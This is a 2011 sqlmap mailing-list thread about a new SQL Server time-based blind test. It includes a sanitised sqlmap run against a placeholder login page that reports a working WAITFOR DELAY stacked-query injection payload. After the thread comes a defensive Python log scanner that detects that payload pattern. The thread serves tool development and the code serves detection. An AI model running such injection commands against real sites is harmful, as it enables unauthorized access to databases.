Re: [sqlmap-users] New SQL Server blind test
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43
Hi again. Have you tried to use it? I am interested in the data retrieval part :))))) (please use -v 3)

KR

On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
>> Hi Steve.
>>
>> Thank you for your patch but I am not sure from SQL's perspective how
>> this could work?
>>
>> So, basically, you are proposing time based sql injection payload (e.g.):
>>
>> IF(1=1) WAITFOR DELAY '0:0:1'
>>
>> and to be honest, I am not sure in which form, other than "stacked"
>> this could fit in??
>>
>> KR
>>
> Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)
> Should work as an OR or AND statement, but then the present logical
> state of the query matters.
>
>
> Here's the output from my successful run using the patch, sanitised for
> public viewing:
> ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST
> --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'
>
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 05:54:02
>
> [05:54:02] [INFO] using 'bogonExampleData' as session file
> [05:54:02] [INFO] testing connection to the target url
> [05:54:02] [WARNING] the testable parameter 'id' you provided is not
> into the Cookie
> [05:54:02] [INFO] testing if the url is stable, wait a few seconds
> [05:54:04] [INFO] url is stable
> [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might
> not be injectable
> [05:54:08] [INFO] testing sql injection on POST parameter 'id'
> [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
> [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE clause'
> [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
> [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase
> time-based' injectable
> [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
> POST parameter 'id' is vulnerable. Do you want to keep testing the
> others? [y/N]
> sqlmap identified the following injection points with a total of 31
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: id
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase time-based
> Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
> ---
>
> [05:55:18] [INFO] testing Microsoft SQL Server
> [05:55:38] [INFO] confirming Microsoft SQL Server
> [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, ASP, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
> [05:56:40] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 18 times
> [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'
> [*] shutting down at: 05:56:40
>
>
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
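A detection-side check for the payload shape shown in Steve's output, added here as an example that is not part of the thread or of sqlmap: it scans constructed IIS-style request log lines (the field layout and the trailing time-taken column are assumptions), flags requests carrying a WAITFOR DELAY, and compares the requested delay with the measured response time to separate a delay that actually executed from one that did not.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines, not real traffic. Assumed layout per line:
# date time method uri query status time-taken-ms
# The second line mirrors the payload sqlmap reported in the thread.
SAMPLE_LOG = """\
2011-01-18 05:54:02 POST /Login.asp id=asdf&pwd=asdf 200 120
2011-01-18 05:54:17 POST /Login.asp id=asdf%27+WAITFOR+DELAY+%270%3A0%3A20%27--+AND+%27uNsX%27%3D%27uNsX&pwd=asdf 500 20231
2011-01-18 05:54:40 POST /Login.asp id=asdf%27+WAITFOR+DELAY+%270%3A0%3A20%27-- 500 95
2011-01-18 05:55:10 GET /Products.asp cat=3 200 80
"""

# Matches the T-SQL delay literal in hh:mm:ss form, case-insensitive.
WAITFOR = re.compile(r"WAITFOR\s+DELAY\s*'(\d+):(\d+):(\d+)'", re.IGNORECASE)


def delay_seconds(match):
    """Convert the captured hh:mm:ss groups to whole seconds."""
    h, m, s = (int(x) for x in match.groups())
    return h * 3600 + m * 60 + s


def find_time_based(log_text):
    """Return one record per request whose query carries a WAITFOR DELAY.

    'executed' is True when the server took at least as long as the
    requested delay, i.e. the injected statement most likely ran; a fast
    response with the same payload means it was rejected or never reached SQL.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip lines that do not fit the assumed layout
        _, time, _, uri, query, status, taken_ms = parts
        # Decode twice so a double-encoded payload is still visible.
        decoded = unquote_plus(unquote_plus(query))
        match = WAITFOR.search(decoded)
        if not match:
            continue
        delay = delay_seconds(match)
        hits.append({
            "time": time,
            "uri": uri,
            "status": int(status),
            "delay": delay,
            "executed": int(taken_ms) / 1000.0 >= delay,
        })
    return hits
```

Run `find_time_based(SAMPLE_LOG)` to see that only the request that stalled for the full 20 seconds is marked as executed; the rest are attempts worth logging but not confirmation of an injectable parameter.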